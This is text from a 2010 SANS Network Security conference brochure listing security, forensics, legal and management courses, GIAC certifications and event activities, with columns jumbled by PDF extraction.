in civil/criminal litigation. the training.) “This course opens the door to a much “This course is spot on for security
virtual network to analyze and will have the opportunity to conduct
“The manuals are some of the best I’ve seen. The instructor “Very valuable, as it not only deeper area of information needed to professionals. It covered project
forensic analysis on a variety of devices.
teaches the material, it also teaches effectively manage the security of a management skills from a security
is extremely knowledgeable and experienced with
“Most in-depth course on digital forensics analysis how to take the exam effectively.” network/application.” point of view.”
mobile forensics and provides great insight to anyone
available today. Goes beyond the basics and -STEVE BRANT, NETT APP -MICHAEL GOLDAMMER, L-3 COM. GSI -ANTWAN BANKS, US ARMY
in the forensic community. The class conversations and
gets down to the nitty-gritty.”
interactions make even the first day of this course more
-ELISE FEETHAM
valuable than other courses I have attended. Great
course!” -HEATHER MAHALIK, BASIS TECHNOLOGY
Want to Advance Your Want to Learn Security from a
FOR558: Network Forensics Page 30 Auditing Security Skills? Legal Perspective?
Network equipment such as Web proxies, firewalls, IDS, routers FOR610: Reverse-Engineering Malware: Malware
AUD507: Auditing Networks, Perimeters, and LEG523: Legal Issues in Information Technology
and even switches contain evidence that can make or break a Analysis Tools and Techniques (GREM) Page 34
Systems (GSNA) Page 24 and Information Security (GLEG) Page 13
case. You will learn how to recover evidence from network-based Expand your capacity to fight malicious code by learning how to
devices and use it to build your case. Each student will be given a This course is the end product of over one hundred skilled system, Day by day, as legislation and lawsuits become more common,
analyze bots, worms, and trojans. This recently expanded, four-day
virtual network to analyze and will have the opportunity to conduct network, and security administrators working with one common the law is assuming greater influence on IT security. This course
course discusses practical approaches to examining malware using
goal – to improve the state of information security. It is based on will help the IT and legal departments better understand each
forensic analysis on a variety of devices. a variety of system monitoring utilities, a disassembler, a debugger,
known and validated threats and vulnerabilities explained from other and find workable solutions to problems. Learn how to
“This course is amazing. Not only are we covering an and other tools useful for reverse-engineering malicious software.
real-world situations that can be used to raise awareness of why word a security policy so as to minimize liability if your enterprise
extensive range of topics, we are doing labwork You don’t have to be a full-time malware searcher to benefit from
auditing is important. From these threats and vulnerabilities we is sued for losing customer data.
for each topic so that we can be comfortable this course. As organizations increasingly rely on their staff to act as
build countermeasures and defenses, including instrumentation, “This course provided tools to help me protect my
with the new material. Love the class! Thank you.” first responders during a security incident, malware analysis skills
metrics, and auditing. company’s assets on the Internet in a noble and justifi-
-DEBORAH GOSHORN, NAVAL POSTGRADUATE SCHOOL are becoming increasingly important.
“The instructor keeps the class interesting. able way I had never thought of before – great insights
“This course was valuable because it gives so many options Lots of material, all of it is useful. No Fluff!” and great discussions.” -PAUL JACOBSEN, FLUOR HANFORD
and software tools to help you analyze malware. The -SANDY WARGO, US ARMY
instructor also made the information easy to comprehend
even with my entry-level knowledge.”
-KEITH HARGROVE, US ARMY
For detailed descriptions of all SANS courses, visit: www.sans.org

For GIAC Certification information, visit: www.giac.org http://it-audit.sans.org
September 19 - 29, 2010 For SANS Technology Institute advanced degree information, visit: www.sans.edu 5
EARN YOUR GIAC C E R T I F I C AT I O N
The Only Hands-on

Ask us about how this
Information Security
ties to the SANS Cyber
Certification
Guardian. Write to
www.giac.org onsite@sans.org.
Top Four Reasons to ‘Get GIAC Certified’ Five Ways to Earn a GSE
The GIAC Security Expert (GSE) is the most
1. Promotes hands-on technical skills and improves prestigious certification in information security.
knowledge retention There are two parts to the GSE exam, a multiple-
“The GIAC certification process forced me to dig deeper into the choice test and a hands-on lab. The multiple-
information that I was taught in class. As a result of this, I integrated this choice test must be completed before the lab. The
training into my practical skill set and improved my hands-on skills.” GSE hands-on lab will be offered at SANS Network
-DEAN FARRINGTON, INFORMATION SECURITY ENGINEER, WELLS FARGO Security 2010. Register by August 1, 2010 to
reserve your seat! (Click on the register button
2. Provides proof that you possess hands-on technical skills on www.giac.org) To apply for the GSE, you will
“GIAC proves that I have a very solid technical background to support any need to meet one of the following prerequisites:
challenge I deal with every day. There are so many new tools coming up 1) GSEC, GCIH, GCIA – two of which must be Gold
daily, but the underlying background essentially remains the same.”
2) GSEC, GCIH, GCIA – one of which must be Gold
-WAYNE HO, BUSINESS INFORMATION SECURITY OFFICER, GLOBAL BANK
and one additional elective certification
3. Positions you to be promoted and earn respect among your peers 3) GSEC, GCIH, GCIA – no Gold and two additional
“I think the GIAC certification has definitely helped provide credibility for me elective certifications
in the work place. This, in turn, has helped me be more effective at my job.” 4) GCWN, GCUX, GCIH, GCIA – one of which must
-MATT AUSTIN, SENIOR SECURITY CONSULTANT, SYMANTEC be Gold
5) GCWN, GCUX, GCIH, GCIA – no Gold and one
4. Proves to hiring managers that you are technically qualified additional elective certification
for the job * Elective certifications include: GCFA, GCFW, GCUX, GCWN,
“Hiring managers are always looking for ways to help sort through GCED, GPEN, GSNA, GWAPT, GAWN, and GREM
candidates. GIAC certifications are a major discriminator. They ensure Learn more about the GSE at
that the candidate has hands-on technical skills.” www.giac.org/certifications/gse.php
-CHRIS SCHOCK, NETWORK ENGINEER, STATE OF COLORADO or contact us at gse@giac.org
CAREER SANS COURSE CERT CAREER SANS COURSE CERT
Security Analyst SANS Security Essentials Penetration Network Penetration

Bootcamp Style Tester Testing and Ethical Hacking
Computer Computer Forensic

Senior Security Advanced Security Essentials Forensics Investigations and
Analyst – Enterprise Defender Incident Response
Intrusion Analyst Intrusion Detection Information SANS Security Leadership

In-Depth Security Manager Essentials for Managers
Incident Handler Hacker Techniques, Exploits, Information Auditing Networks,

and Incident Handling Security Auditor Perimeters, and Systems

September 19 - 29, 2010 To see other GIAC certifications, go to www.giac.org.
D E P A R T M E N T O F D E F E N S E
DoD Directive 8570 requires:

By the end of CY 2010, ALL personnel performing IAT and IAM functions must be certified.
By the end of CY 2011 ALL personnel performing CND-SP and IASAE roles must be certified.
ALL IA jobs will be categorized as ‘Technical’ or ‘Management’ Level I, II, or III,
and to be qualified for those jobs, you must be certified.
DoD Baseline IA Certifications SANS Training for

GIAC Certifications
TECH I TECH II TECH III
A+ GSEC GSE
COURSE CERT
Network+ Security+ CISSP*
SSCP SCNP GCIH AUD507 . . . . . . . . . . . .GSNA
SSCP SCNA CISA
MGT414 . . . . . . . . . . .CISSP
MGT I MGT II MGT III
GSLC GSLC GSLC MGT512 . . . . . . . . . . . GSLC
GISF CISSP* CISSP*
Security+ CAP CISM CAP CISM SEC301 . . . . . . . . . . . . .GISF
SEC401 . . . . . . . . . . . . GSEC
Information Assurance System Architecture
and Engineering (IASAE) Certifications SEC503 . . . . . . . . . . . . GCIA
IASAE I IASAE II IASAE III SEC504 . . . . . . . . . . . . GCIH
}
CISSP* CISSP* CISSP-ISSEP SEC401
CISSP-ISSAP SEC503 . . . . . . . . . GSE
SEC504
Computer Network Defense (CND) Certifications
CND INCIDENT
CND ANALYST RESPONDER CND AUDITOR
GCIA GCIH GSNA
CEH CSIH CEH CISA CEH
CND INFRASTRUCTURE SUPPORT CN-SP MANAGER

SSCP CEH CISSP-ISSMP CISM
*Or Associate
“It’s not about the cert, it’s about the knowledge gained
in pursuit of the cert.” -DAVE HULL, TRUSTED SIGNAL, LLC
Get more information at 8570@sans.org and www.sans.org/8570
September 19 - 29, 2010 7
Enhance your SANS training! As an added benefit to your training dollar, attend these free talks.
SANS@Night
Check www.sans.org/network-security-2010/night.php for dates and times.
Network Vulnerability Exploitation, Step By Step What’s New for Security in Windows 7
From Discovery through to Metasploit Module and Server 2008-R2?
Speaker: David Hoelzer Speaker: Jason Fossen
This short one hour evening presentation explains the The Vista nightmare is finally over, but what’s new for
causes of Heap and Stack Overflows and then presents security in Windows 7 and Server 2008-R2 then? The aim
a step-by-step tutorial demonstrating how to write of this talk is to give you a bird’s eye view of the Win7
basic shellcode, how to find an overflow condition, how security enhancements to help you decide whether to
to determine memory offsets and how to hand-craft upgrade or to grit your teeth and stick with XP for another
an exploit. Attendees need not have deep knowledge ten years. Topics include BitLocker To Go for flash drives,
of programming or security flaws. Those who have AppLocker program whitelisting, IPSec DirectAccess, Vendor Expo Vendor Welcome Reception
some experience should be able to duplicate the BranchCache, PowerShell 2.0, booting from VHD files, IE8 Tuesday, September 21, 2010 Tuesday, September 21, 2010 • 5:00pm - 7:00pm
demonstrations, giving you the ability to show others how SmartScreen Filter, hyper-detailed logging, and the hated
12:00pm - 1:30pm and 5:00pm - 7:00pm This informal reception allows you to visit exhibits and
these types of flaws are exploited. User Account Control prompt. Bring your questions and
get it straight without the anti-Microsoft FUD or the pro- All attendees are invited to meet with established and participate in some exciting activities. This is a great
The Return of Command Line Kung Fu Microsoft propaganda! emerging solution providers as they reveal the latest tools time to mingle with your peers and experience firsthand
Speaker: Hal Pomeranz and technologies critical to information security. The SANS the latest in information security tools and solutions
Hal Pomeranz serves up another tasty serving of his Linux
Knock, Knock! How Attackers Use Social Engineering Network Security 2010 Vendor Expo showcases product with interactive demonstrations. Enjoy appetizers
command line madness. Come learn command line skills to Bypass Your Defenses offerings from key technology providers in the commercial and beverages and compare experiences with other
(and dirty tricks) to help automate common security and Speaker: Lenny Zeltser tools and services market. Vendors arrive prepared to attendees regarding the solutions they are using to
audit-related tasks in Linux and Unix. Bring your thorniest interact with a technically savvy audience. You’ll find address security threats in their organization. Attendees
Why bother breaking down the door if you can simply
problems and try to “stump the expert”. demonstrations and product showcases that feature all the can visit sponsors to receive raffle tickets and enter to
ask the person inside to let you in? Social engineering
works, both during penetration testing and as part of best that the security industry has to offer! win exciting prizes. Prize drawings occur throughout the
Cyberwar or Business as Usual? – real-world attacks. This talk explores how attackers are expo. The more vendors you visit the more chances you
The State of US Federal CyberSecurity Initiatives using social engineering to compromise defenses. It SANS Technology Pavilion have to win!
Speaker: James Tarala presents specific and concrete examples of how social During the expo session, attendees are encouraged to visit
engineering techniques succeeded at bypassing corporate the SANS Technology Pavilion, a vendor-sponsored learning Vendor-Sponsored Breakfasts,
Are we near the point of cyber-armageddon or are we security defenses. Attend this engaging talk to improve Lunch & Learns, and Cocktail Briefs
forum dedicated to specific information security solutions
simply engaged in a new reality of information security the relevance of your security awareness training and to
priorities? Are the attacks being discovered daily against that are helping organizations successfully address their Throughout SAN Network Security 2010 vendors will
adjust your defenses by revisiting your perspective of the unique security challenges. See thought leaders and product
private sector and public federal systems somehow provide sponsored breakfast sessions and lunches where
threat landscape.
unique and new, or are they simply the new reality specialists give brief demonstrations on their solution. See attendees can interact with peers and receive education
of cyberspace? Organizations are regularly forced to something that peaks your interest? Visit the sponsor’s booth on vendor solutions. Take a break and get up to date on
make difficult decisions about how best to protect their
Opportunity for the Best Security Professionals: for a guided walk-through of these industry leading products. security technologies! Check the bulletin boards near the
information systems. How do organizations know when Deflect Legal Liability Caused by SANS Network Security 2010 registration desk for session
security mechanisms are enough to keep their data Growing Security Threats Vendor Sponsored Lunch Sessions details and availability. Space is limited; sign up at the
safe? In an effort to answer this question and respond Speaker: Ben Wright Tuesday, September 21, 2010 • 12:00pm - 1:30pm registration desk on-site.
to mounting cyber incidents worldwide, the US federal
government has been engaging in numerous efforts to As IT security threats evolve, multiply and come to have Sign-up at SANS Registration to receive a ticket for a free The evening cocktail brief events bring good fun and
secure cyberspace. But what are they and will they be greater impact on society, the potential legal liability lunch brought to you by sponsoring vendors. Join these great conversation from hosting vendors. Join the
enough? In this presentation, James Tarala will describe connected with a security breach is growing. The need sponsoring vendors and others on the expo floor for an party, have a drink, and take a look at solutions that
current efforts and the tools being offered to help citizens for change is urgent. Mr. Wright shares latest ideas on introduction to leading solutions and services that showcase can help address your organization’s key security
and protect cyberspace. how greater professionalism in among IT security experts the leading options in information security. Take time to issues. The list of Cocktail Briefs will be posted on-site
can help their employers avoid costly lawsuits and browse the show floor and get introduced to providers and
government investigations. at the registration desk.
their solutions that align with the security challenges being

September 19 - 29, 2010
discussed in class. SANS Network Security 2010
September 19 - 29, 2010 9
Earn Your
Master’s Degree in
Information Security
from the
SANS Technology
Institute!
SANS Technology Institute, an affiliate of
the SANS Institute and Global Information
Assurance Certification (GIAC), offers one of
the few master’s programs in the industry
with a specific technical focus on information
security. The SANS Technology Institute’s
mission is to develop the leaders who will
strengthen the security of cyberspace.
If you hold a current GIAC Gold certification

with scores of 80 or above in a major course
related to the master’s curriculum, then you
have already satisfied one of the prerequisites
for admission into the master’s program.
Applicants who are admitted to a degree
program may transfer in GIAC certifications
if they are current, related to the curriculum,
www.sans.edu and have a score of 80 or above.
Prerequisites How to Apply How to Take Courses

• A current GIAC Gold Level certification with • Complete the downloadable application at Students have a multitude of course delivery
exam scores averaging 80 or above from a www.sans.edu/downloads/application.pdf options to meet their degree requirements.
major certification in the degree program. Courses may be taken at SANS training
• Submit the Employer Recommendation of Candidate Form
events or through the following delivery
• Bachelor’s degree from an accredited college • Request undergraduate institution to forward an official sealed methods: SANS vLive!, SANS OnDemand, or a
or university with a GPA of 2.8 or higher – transcript to the SANS Technology Institute limited number of SANS SelfStudy.
unrelated field ok. (Limited exceptions are
described at www.sans.edu/admissions) • Submit a non-refundable Application Fee Not all delivery methods are available for all
• See www.sans.edu/admissions for detailed admission requirements courses.
• One-year of experience in information
technology/security; three years of significant
experience expected upon completion of the
For admissions questions, please go to www.sans.edu Authorization
or contact Debbie Svoboda, Dean of Admissions, at info@sans.edu
program or 720-941-4932. The SANS Technology Institute (STI) is
• Strong leadership ability (Must be evident in authorized to grant Master’s degrees by the
Tuition assistance is available through limited work-study opportunities. Maryland Higher Education Commission.
application essays)

September 19 - 29, 2010
The STI Master’s Program can be Completed in TWO Years
See the recommended degree plans below.
In addition to courses and exams, there are six Community Service Projects required with both degree programs.
Learn more about CPRs at www.sans.edu/programs/community.php.
STI operates on a quarterly or rolling system.
The Master of Science Degree in The Master of Science Degree in

Information Security Engineering Information Security Management
CURRICULUM CURRICULUM
Admission SEC401 Admission MGT512

Requirement SANS Security Essentials SANS Security Leadership Essentials For Managers
Requirement with Knowledge Compression™
or First Quarter & GIAC GSEC Gold or First Quarter
& GIAC GSLC Gold
Second
SEC504
Quarter
Hacker Techniques, Exploits & Incident Handling
Second
SEC504
& GIAC GCIH Gold Hacker Techniques, Exploits & Incident Handling
Quarter
& GIAC GCIH Gold
MGT525**
Third Project Mgt and Effective Communications for
Quarter Security Professionals and Managers MGT525**
Third Project Mgt and Effective Communications for
& GIAC GCPM Gold Security Professionals and Managers
Quarter
& GIAC GCPM Gold
Fourth
SEC503
Intrusion Detection In-Depth
Quarter
& GIAC GCIA Gold Fourth
AUD507
Auditing Networks, Perimeters, & Systems
Quarter
& GIAC GSNA Gold
MGT404*
Fundamentals of Information Security Policy
MGT404*
Fifth MGT421* Fundamentals of Information Security Policy
Quarter SANS Leadership and Management Competencies
Fifth MGT421*
MGT438* Quarter SANS Leadership and Management Competencies
How to Establish a Security Awareness Program
MGT438*
Sixth How to Establish a Security Awareness Program
Quarter Elective Course
MGT411
Seventh
Quarter
Elective Course Sixth SANS 27000 Implementation & Management
Quarter
& GIAC G7799 Gold
Software Security Training
Eighth
Quarter Choice of courses: LEG523
see www.sans.edu/programs/msise Seventh Legal Issues in Information Technology
Quarter and Information Security
& GIAC GLEG Gold
ELECTIVES
Any SEC/FOR 500/600-Level Courses Software Security Training
(FOR508 recommended), Eighth
Quarter Choice of courses:
AUD 507; see www.sans.edu/programs/msism
& GIAC Certs
For a detailed description of this curriculum, For a detailed description of this curriculum,
please visit www.sans.edu/programs/msise please visit www.sans.edu/programs/msism
*Plus a written assignment **MGT525 is offered 2-3 times a year SANS Network Security 2010
September 19 - 29, 2010 11
Enhance your Training! The SANS WhatWorks in Legal Issues and PCI Compliance in Information Security Summit is being held in conjunction with SANS NS 2010 in Las Vegas.
Legal Issues and PCI Legal Issues in Information Technology LEGAL
and Information Security 523

Compliance in Information Five-Day Program • Wed, Sept 22 - Sun, Sept 26, 2010 • 9:00am - 5:00pm
30 CPE Credits • Instructor: Ben Wright Who Should Attend
Security Summit 2010 New laws regarding privacy, e-discovery, and

data security are creating an urgent need for
• Security and IT
professionals
• Lawyers
Las Vegas • September 22-29, 2010 professionals who can bridge the gap between • Paralegals
the legal department and the IT department. • Auditors
E-Data Retention, Discovery and Destruction: PCI: Meeting Requirements & Minimizing Liability
This necessary professional training is uniquely available • Accountants
Developing and Implementing IT Policy One of the most interesting discussions at the SANS
in SANS’ LEG523 series of courses, including skills in • Compliance managers
All IT departments struggle with the establishment Security West conference earlier this year had to do the analysis and use of contracts, policies, and records
of policy on the retention of electronic records, such with the fact that while standards are good, they • Vendors of security
management procedures. technologies and services
as e-mail. These records are commonly demanded often don’t require that we do things correctly. PCI/
GIAC certification under LEG523 demonstrates to employ- • Regulatory officials
in lawsuits, investigations, FOIA requests and other DSS, for example, requires that sensitive data must
ers that a professional has not only attended classes, but • Investigators
legal inquiries. To address these struggles, SANS be encrypted at rest, but it doesn’t actually require Senior Instructor studied and absorbed the sophisticated content of these
will hold a groundbreaking Summit where you that you do so correctly. What does this mean? Benjamin Wright courses. Certification distinguishes any professional,
will hear from the experts and the users that have What would make it correct and actually limit your Benjamin Wright is whether an IT expert, an auditor, a paralegal, or a lawyer,
addressed these issues in their organizations. organization’s liability? the author of several and the value of certification will grow in the years to come
technology law books, as law and security issues become even more interlocked.
AUD521: Meeting the Minimum: PCI/DSS 1.2: including Business Law This course covers the law of business, contracts, fraud,
crime, IT security, IT liability, and IT policy – all with a
Becoming and Staying Compliant
and Computer Security,
published by the SANS focus on electronically stored and transmitted records.
Institute. With 24 years LEG523 is a five-day package delivering the content of the GIAC Certification
Two-Day Course • 9:00am - 5:00pm • Tue, Sept 28 - Wed, Sept 29, 2010 www.giac.org
following one-day courses:
12 CPE Credits • Laptop Required • Instructor: SANS Staff in private law practice, he
The payment card industry has been working over the past several years to has advised many organi- Fundamentals of IT Security Law and Policy
formalize a standard for security practices that are required for organizations zations, large and small,
E-Records, E-Discovery, and Business Law
who process or handle payment card transactions. The fruit of this labor is the on privacy, e-commerce,
Payment Card Industry Data Security Standard (currently at version 1.2). computer security, and Contracting for Data Security and Other Technology
This standard, which started life as the Visa Digital Dozen, is a set of focused e-mail discovery and been The Law of IT Compliance: How to Conduct Investigations
comprehensive controls for managing the risks surrounding payment card quoted in publications Lessons will be invaluable to the proper execution of any kind of
transactions, particularly over the Internet. Of course, compliance validation
around the globe, from the internal investigation.
is one of the requirements. This course was created to allow organizations to
Wall Street Journal to the
exercise due care by performing internal validations through a repeatable, Applying Law to Emerging Dangers: Cyber Defense
objective process. While the course will cover all of the requirements of the Sydney Morning Herald. He In-depth review of legal response to the major security breach at TJX.
standard, the primary focus is on the technical controls and how they can be wrote and presented to
measured. Every student will leave the class with a toolkit that can be used to the Sri Lankan government Special Features! This legal offering will cover many recent
validate any PCI/DSS environment technically and the knowledge of how to use it. developments, including TJX, amendments to the Federal Rules
a report on technology
Register at Who Should Attend Sampling of Topics law, which contributed to of Civil Procedure pertaining to the discovery of electronic records Register at
www.sans.org/ • Managers overseeing PCI/DSS compliance • Requirements for compliance the adoption of national in litigation, and the torment Hewlett-Packard has endured www.sans.org/
• External auditors performing PCI/DSS validation • Compliance guidance for each control for spying on journalists and members of its board of directors.
pci-legal-info-tech- e-commerce legislation pci-legal-info-tech-
• Security professionals operating in a PCI/DSS • Suite of tools for validating technical compliance Hewlett-Packard employed its internal security team and outside
summit-2010 compliant environment • Explanation of alternative controls
in 2005. Wright maintains
investigators in ways that raised legal questions (can you say, summit-2010
• Internal auditors desiring to validate interim a popular blog at http:// “computer crime law”?) and led to criminal indictments. All security
• Discussion of determining scope for compliance
12 compliance requirements legal-beagle.typepad.com. professionals should know the lessons from these cases. 13
Real Threats, Real Skills, Real Success
T H E
SANS CYBER GUARDIAN
P R O G R A M
About the Program

SANS Cyber Guardian program is designed for the elite
teams of technical security professionals who are part
of the armed forces, Department of Defense, govern-
ment agencies, and organizations whose role includes
securing systems, reconnaissance, counterterrorism and
counter hacks. These teams will be the cyber security
CYBER GUARDIAN special forces where each individual’s role makes the
team successful.
PROGRAM
Program Overview
• Prerequisite of a GSEC or CISSP
• Core Courses and Certification:
- SEC503: Intrusion Detection In-Depth - GCIA
- FOR508: Computer Forensic Investigations and
Incident Response - GCFA
- SEC560: Network Penetration Testing and Ethical Hacking - GPEN
• Select a Red or Blue Specialty
• Complete and Pass Two Specialty Courses and Certifications
• Complete the GSE Hands-On Exam
Join as a Team or an Individual

Both individuals and teams of information security
professionals can participate in the SANS Cyber
Guardian Program.
For Teams
• Define the size, scope, and mission of your Cyber Guardian Team(s)
• Develop a method to identify talent within your organization
www.sans.org/ • Select skilled individuals for advanced training for the Cyber
Guardian Team
cyber-guardian • Determine your method for training
- Live OnSite - At your company location
- Live Conference - At a public SANS conference
Become a SANS Cyber Guardian - OnDemand - SANS Computer-Based Training (CBT)
- VLive! - Live instruction via the web
and stay one step ahead • Contact us at onsite@sans.org to create a training schedule
of the threats as well as For Individuals
• Choose your specialty – Red or Blue
know what to do
• Complete the Cyber Guardian application and recommendation forms
when a breach occurs. • Determine your method for training
- Live Conference – At a public SANS conference
- OnDemand - SANS Computer Based Training (CBT)
Learn more at www.sans.org/cyber-guardian - VLive! - Live instruction via the web
14 • Contact us at onsite@sans.org to create a training schedule

DEVELOPER SKILL-BASED SHORT COURSE
DEV541: Secure Coding in Java/JEE:
Developing Defensible Applications
Four-Day Course • 9:00am - 5:00pm • Mon, Sept 20 - Thu, Sept 23, 2010 • 24 CPE Credits • Laptop Required • Instructor: Frank Kim
The Difference between Good and Great Programmers This course covers
Great programmers have traditionally distinguished themselves by the elegance, effectiveness, the OWASP Top
and reliability of their code. That’s still true, but elegance, effectiveness, and reliability have now 10 and the CWE/
been joined by security. Major financial institutions and government agencies have informed their SANS Top 25
internal development teams and outsourcers that programmers must demonstrate mastery of se- Programming
cure coding skills and knowledge, through reliable third-party testing, or lose their right to work on Errors which are
assignments for those organizations. More software buyers are joining the movement every week. important in Java
The Only Course Covering the Key Elements of Secure Application Development in Java development.
Such buyer and management demands create an immediate response from programmers,
“Where can I learn what is meant by secure coding?” This unique SANS course allows you Who Should Attend:
to bone up on the skills and knowledge being measured in the third-party assessments as • Developers who want to build
defined in the Essential Skills for Secure Programmers Using Java/JavaEE. (You can find the more secure applications
Essential Skills document at http://www.sans-ssi.org/blueprint_files/java_blueprint.pdf. ) • Java EE programmers
What Does the Course Cover? • Software engineers
This is a comprehensive course covering a huge set of skills and knowledge. It’s not a high • Software architects
level-theory course. It’s about real programming. In this course you will examine actual • Application security auditors
code, work with real tools, build applications, and gain confidence in the resources you need • Technical project managers
for the journey to improving security of Java applications. • Senior software QA specialists
Rather than teaching students to use a set of tools, we’re teaching students • Penetration testers who want a
concepts of secure programming. This involves looking at a specific piece deeper understanding of target
of code, identifying a security flaw, and implementing a fix for that flaw. applications or who want to pro-
vide more detailed vulnerability
Prerequisites Students should have at least one year’s experience working with the JEE remediation options
framework and should have thorough knowledge of Java language and Web technology.
MANAGEMENT SKILL-BASED SHORT COURSE
MGT305: Technical Communication and Presentation Skills

for Security Professionals
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Hoelzer
This course is designed for every IT professional in your organization. In this course we cover the top techniques that
will show any attendee how to research and write professional quality reports, how to create outstanding presentation
materials, and as an added bonus, how to write expert witness reports. Attendees will also get a crash course on advanced
public speaking skills.
Writing reports is a task that many IT professionals struggle with, sometimes from the perspective of writing the report
and other times from the perspective of having to read someone else’s report! In the morning material we cover step by
step how to work through the process of identifying critical ideas, how to properly research them, how to develop a strong
argument in written form, and how to put it all down on paper. We also discuss some of the most common mistakes that
can negatively impact the reception of your work and show how to avoid them. Attendees can expect to see the overall
quality of their reports improve significantly as a result of this material.
Writing the presentation is only half of the battle, though. How do you stand up in front of a group of five or even five
thousand and speak? In the afternoon we will share tips and techniques of top presenters that you can apply to give
the best presentation of your career. Additionally, students will have the opportunity to work up and deliver a short
presentation to the class followed by some personal feedback from one of SANS’ top speakers.
Register at www.sans.org/network-security-2010
September 19 - 29, 2010 15
MANAGEMENT SKILL-BASED SHORT COURSES
MGT404: Fundamentals of Information Security Policy
One-Day Course • 9:00am - 5:00pm • Sun, Sept 19, 2010 • 6 CPE Credits • Laptop Required • Instructor: Northcutt
Note: There is a lot of material to cover and we do not want to throttle discussion in class, this course may run past the
scheduled time.
This course is designed for IT professionals recently assigned security duties which include responsibility for creating and
maintaining policy and procedures.
The Fundamentals of Information Security Policy course focuses on how to write basic security policies that are issue or
system specific. The student will have a hands-on practical assignment writing a policy template not currently offered as
one of SANS policy templates.
Business needs change, the environment changes, new risks are always on the horizon, and critical systems are continually
exposed to new vulnerabilities. Policy development and assessment is a never ending process. This is a hands-on, exercise
intensive course on writing, implementing and assessing security policies. This course is for anyone who is responsible for
writing security policies and procedures.
MGT421: SANS Leadership and Management Competencies

One-Day Course • 9:00am - 5:00pm • Sat, Sept 25, 2010 • 6 CPE Credits • Laptop Recommended • Instructor: Northcutt
Leadership is a capability that must be learned and developed to better ensure organizational success. The more
techniques we learn, the better our leadership capability becomes. It is brought primarily through selfless devotion to the
organization and staff, tireless effort in setting the example, and the vision to see and effectively use available resources
toward the end goal. Leaders and followers influence each other toward the goal, identified through a two-way street
where all parties perform their function to reach the overall objective.
Our focus is purely leadership-centric, we are not security-centric or technology-centric with this training opportunity. We
help an individual develop leadership skills that apply to commercial business, non-profit, not-for-profit, or other organiza-
tion. This course is designed to develop existing and new supervisors and managers who aspire to go beyond being the
boss and build leadership skills to enhance their organizational climate through team-building to enhance the organiza-
tional mission through growth in productivity, workplace attitude / satisfaction, and staff and customer relationships.
The manager/supervisor will learn vital, up-to-date knowledge and skills required to shift team paradigms to create a
more positive and cooperative atmosphere in the workplace. Essential leadership topics covered in this management
track include: Leadership Development, Coaching and Training, Employee Involvement, Conflict Resolution, Change
Management, Vision Development, Motivation, Communication Skills, Self-Direction, Brainstorming Techniques, Benefits,
and the ten core Leadership competencies. In a nutshell, this course covers critical processes that should be employed to
develop the skills and techniques to select, train, equip, and develop a team into a single cohesive unit with defined roles
that operate together in harmony toward team-objective accomplishment.
MGT570: Social Engineering Defense

NEW Two-Day Course • 9:00am-5:00pm • Sun, Sept 26-Mon, Sept 27, 2010 • 12 CPE Credits • Laptop Required • Instructor: Jonathan Ham
Social engineering attacks are on the rise all around the world. The Anti-Phishing Working Group reported that in the first
half of 2009, the number of known, unique phishing sites reached a high of 49,084 per month. Voice social engineering is
used to steal credit card numbers, employee credentials, and more. Companies are routinely targeted by attackers who are
increasingly skilled at manipulating employees to gain access to valuable information and /or facilities.
In this course, security and IT professionals will learn how to design an effective, ethical social engineering testing and
training program. Working in teams, students will take turns developing and practicing e-mail, phone and physical social
engineering techniques customized for their own organizations. Students will analyze case studies, accompanied by video
and audio clips. By the end of the class, each student will have developed a customized social engineering testing and
training program for their organization.

September 19 - 29, 2010 Register at www.sans.org/network-security-2010
FORENSICS SKILL-BASED SHORT COURSES
FOR526: Advanced Filesystem Recovery and Memory Forensics
One-Day Course • 9:00am - 5:00pm • Sun, Sept 26, 2010 • 6 CPE Credits • Laptop Required • Instructor: Lee
This advanced course is perfect for the diligent student familiar with core forensic methodology and techniques. If
you understand forensic filesystem fundamentals, then this course is for you. It moves quickly from covering memory
forensics to recovering and discovering deleted partitions from hard drives. This course focuses on innovative forensic
techniques and methodologies so that seasoned practitioners can keep their skills sharp and
Who Should Attend:
up-to-date with the latest research areas in both live and static-based disk forensics.
• System administrators and
You will receive: incident handling personnel
• Forensic analysis workstation VMware machine equipped to investigate forensic data who are trying to further
their knowledge in the latest
• Course DVD loaded with case examples, tools, and documentation forensic techniques
Prerequisites • Anyone who wants to learn
This advanced course is perfect for the diligent student conversant with file system forensic techniques. If you are just how file system partitions
beginning in digital forensics, this course is not appropriate for you, as the basics of digital forensics will not be covered. are structured
• Anyone who wants to learn
Topics Covered how to recover lost partitions
• File system structures and metadata • Following Microsoft Windows memory process from a physical disk image
• Partitioning schemes • The usefulness of collecting memory • Anyone who wants to learn
• Mapping out disk partitions by hand • Techniques to collect memory how to forensically recover
• Discovering lost partitions from a formatted drive • Memory analysis techniques artifacts from memory
• Windows memory structures collected from a machine.
SECURITY SKILL-BASED SHORT COURSES
SEC565: Data Leakage Prevention – In Depth

Four-Day Course • 9:00am - 5:00pm • Mon, Sept 20 - Thu, Sept 23, 2010 • 24 CPE Credits • Laptop Required • Instructor: SANS Staff
The public is growing impatient with data leaks, as we can see from stricter laws, fallout surrounding reputational damage,
and law suits. This new focus makes information security a ‘bottom-line’ business requirement. When 40% of reported
data breaches are caused by human error, we must expand our attention to include the business processes supported by
information technology.
Please Note: While the
Data Leakage Prevention – In Depth provides professionals with time-tested methodologies course provides information
for detecting data leakage risks and identifying safeguards. When students return to work about legal obligations
they will be able to address their organization’s requirements for protecting confidential for protecting confidential
information, it is not offered
information, create a data leakage prevention team, conduct an information risk assessment,
as legal advice or as a
analyze possible weaknesses in technical systems, and recommend effective approaches for comprehensive educational
safeguarding systems and processes. program around your or
During class we will go in depth into technical subjects to discuss how confidential information your organization’s legal
obligations. For more
gets into the wrong hands. For example, a good security design is pertinent to the storage of information in these areas,
critical information in databases, Web applications, e-mail, cloud computing, VPNs, and many please consider taking one of
other technologies. The course will demystify encryption, text pattern matching, outsourcing, the SANS legal courses.
cloud computing, and social networking as they relate to DLP. Moreover, other relevant issues
include the fact that outsiders, including the general public and hackers, can also access confidential information through
low-tech means, like paper, social engineering, physical access, and portable storage media. The course will teach you
about the data leakage risks in all of these areas and more and will demonstrate safeguards with hands-on exercises.
This course provides a comprehensive discussion of DLP requirements and provides techniques for students to determine
and evaluate their organization’s DLP risks. The material presents both technical and management subject matter and is de-
signed for technical professionals who are responsible for protecting the confidential information within their organization.
September 19 - 29, 2010 17
SEC546: IPv6 Essentials
